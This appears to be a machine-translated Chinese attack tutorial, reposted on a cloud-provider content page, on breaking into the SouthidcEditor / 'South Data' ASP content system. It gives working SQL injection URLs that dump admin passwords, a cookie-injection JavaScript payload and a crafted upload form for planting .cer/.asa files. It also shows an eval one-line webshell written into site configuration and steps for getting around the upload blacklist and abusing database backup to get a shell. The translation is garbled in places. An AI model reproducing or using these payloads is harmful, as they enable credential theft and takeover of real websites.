South Data Editor Southidceditor latest injection 0day vulnerability

Source: Internet
Author: User
Tags chr eval file upload

1. Injection point:

The code is as follows Copy Code
news_search.asp?key=7% ' Union select 0,USERNAME%2BCHR (124)%2bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '% ' = ' & Otype=title&submit=%cb%d1%cb%f7

Direct Mob Administrator account password (MD5)

2. Landing Backstage

3. Upload with Editor:

Access

The code is as follows Copy Code
Admin/southidceditor/admin_style.asp

Modify the editor style to add ASA (no ASP). And then directly backstage edit the news upload.

========================================

Resources collation:

1, through the upfile_other.asp vulnerability file to take the shell directly

Directly open userreg.asp for registered members, login, (in the state of not exiting the login) using the local upload file upload code as follows:

The code is as follows Copy Code

<meta http-equiv=content-type content= "text/html; charset=gb2312"
< STYLE type=text/css>body {
font-size:9pt; Background-color: #e1f4ee
}
. tx1 {
Border-right: #000000 1px solid; Border-top: #000000 1px solid; font-size:9pt; Border-left: #000000 1px solid; COLOR: #0000ff; Border-bottom: #000000 1px solid; height:20px
}
</style>

<meta content= "MSHTML 6.00.2800.1400" name=generator><body leftmargin=0 topmargin=0>
<form name=form1 action= "/upfile_other.asp"; Method=post
Enctype=multipart/form-data><input type=file size=30 name=filename> <input type=file size=30 name= filename1> <input xxxxx= "Border-right:rgb (88,88,88) 1px double; Border-top:rgb (88,88,88) 1px double; Font-weight:normal; font-size:9pt; Border-left:rgb (88,88,88) 1px double; Line-height:normal; Border-bottom:rgb (88,88,88) 1px double; Font-style:normal; Font-variant:normal "Type=submit value= upload name=submit>
<input id=photourlid Type=hidden value=0 name=photourlid> </FORM></BODY></HTML>

Save the above code in HTML format, replace the URL in the code, the first box to select the picture file, the second box to select. CER,. asa or ASP file upload (after a space, looks like in the IE8 to use can not be followed by a space, add a space when the Selection file dialog box, I can't find a solution.

Note: This method kills South data, fine precision system, net soft world, etc.

2, by injecting seconds to kill the administrator account password, using the following:

The code is as follows Copy Code

/newstype.asp? Smallclass= '%20UNION%20SELECT%200,USERNAME%2BCHR (124)%2bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union% 20select%20*%20from%20news%20where%201=2%20and%20 ' = '

The above code directly bursts the administrator account number and the password, takes the Shell method as follows:

Written in the copyright information of the site configuration [/admin/siteconfig.asp]%><%eval (Request CHR)%><% '
Successfully writes the shell

The code is as follows Copy Code
/inc/config.asp

Here's a word Chr (32) The password is "#"

3. Cookie Injection

Empty the Address bar, use the Union statement to inject, commit:

The code is as follows Copy Code

Javascript:alert (document.cookie= "id=" +escape ("1 and 1=2 Union select 1,username,password,4,5,6,7,8,9,10 from Admin") )

If you cow you are handmade, anyway, I will not, with the Big Brother Hedgehog "cookie injection conversion Tool" convenient and rapid why not?

Note: It seems that the southern data, fine precision system, network software and other systems are also the existence of cookie injection.

(Of course, the south is not only the top three loopholes, there are several loopholes seemingly not commonly used, anyway, I give me a common summary of hope for everyone to help)

Third, the background to take the Shell method summary

(1) In the system management of the Web site configuration to insert a word horse: After entering the background, click "System Management" on the left and click "Site Configuration" to add "%><%eval" (Chr (112)) to the right "site name" (also available in other places)%> <% ', then point to save the configuration, as shown in figure:

Then we open the inc/config.asp file and see a word that the horse has been written to the configuration file,

Then again opened a word to the horse's client, submitting likewise to get a pony

(Note: The following are on the other site to test the cut map, in order to prevent information leakage, not interception of web links, please understand!) )

(2) Background upload vulnerability, in the upfile_photo.asp file part of the code fragment is as follows:

The code is as follows Copy Code

If fileext= "ASP" or fileext= "ASA" or fileext= "aspx" Then
Enableupload=false
End If
If Enableupload=false Then
msg= "This file type is not allowed to upload! NN only allows uploading of these types of files: "& Upfiletype
Founderr=true
End If

You can see that the program only limited to the "ASP", "Asa", "aspx" File upload, we only in the "Site Configuration" of the allowed upload file types to increase the upload "CER" can be resolved by the server file types, as shown in the figure:
When the submission shows the download page, upload other such as "htr,cdx" suffix files, when the server does not request (can only say bad luck)

(3) Background backup, directly in the "Product management" of the added product upload the jpg suffix of the ASP horse, and then to the "System Management" database backup, in the "Current Database path" column fill in the path of the upload, in the "Backup database name" to fill in the name of the horse you want to back up, However, the system is automatically added after the name. Asa

Click OK to prompt "Back up the database successfully ..." But the actual file is not. ASA's

Direct access to the address after the backup, you get a Webshell
(Although the above is done with the background of the Web demo, but the south and fine background to take the shell are similar)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.